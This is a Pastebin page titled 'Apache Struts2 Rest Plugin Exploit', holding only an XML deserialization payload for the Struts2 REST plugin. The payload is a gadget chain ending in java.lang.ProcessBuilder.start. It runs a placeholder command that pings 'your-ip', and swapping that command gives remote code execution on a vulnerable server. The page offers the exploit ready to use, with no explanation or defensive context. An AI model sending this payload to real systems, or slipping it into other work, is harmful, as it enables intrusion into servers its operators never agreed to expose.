yeahhub

Apache Struts2 Rest Plugin Exploit

Aug 7th, 2018
275
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <map>
  2.   <entry>
  3.     <jdk.nashorn.internal.objects.NativeString>
  4.       <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
  5.         <dataHandler>
  6.           <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
  7.             <is class="javax.crypto.CipherInputStream">
  8.               <cipher class="javax.crypto.NullCipher">
  9.                 <serviceIterator class="javax.imageio.spi.FilterIterator">
  10.                   <iter class="javax.imageio.spi.FilterIterator">
  11.                     <iter class="java.util.Collections$EmptyIterator"/>
  12.                     <next class="java.lang.ProcessBuilder">
  13.                       <command>
  14.                         <string>ping</string><string>-n</string><string>2</string><string>your-ip</string>
  15.                       </command>
  16.                     </next>
  17.                   </iter>
  18.                   <filter class="javax.imageio.ImageIO$ContainsFilter">
  19.                     <method>
  20.                       <class>java.lang.ProcessBuilder</class>
  21.                       <name>start</name>
  22.                       <parameter-types/>
  23.                     </method>
  24.                   </filter>
  25.                   <next></next>
  26.                 </serviceIterator>
  27.                 <lock/>
  28.               </cipher>
  29.               <input class="java.lang.ProcessBuilder$NullInputStream"/>
  30.               <ibuffer/>
  31.             </is>
  32.           </dataSource>
  33.         </dataHandler>
  34.       </value>
  35.     </jdk.nashorn.internal.objects.NativeString>
  36.     <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  37.   </entry>
  38. </map>
RAW Paste Data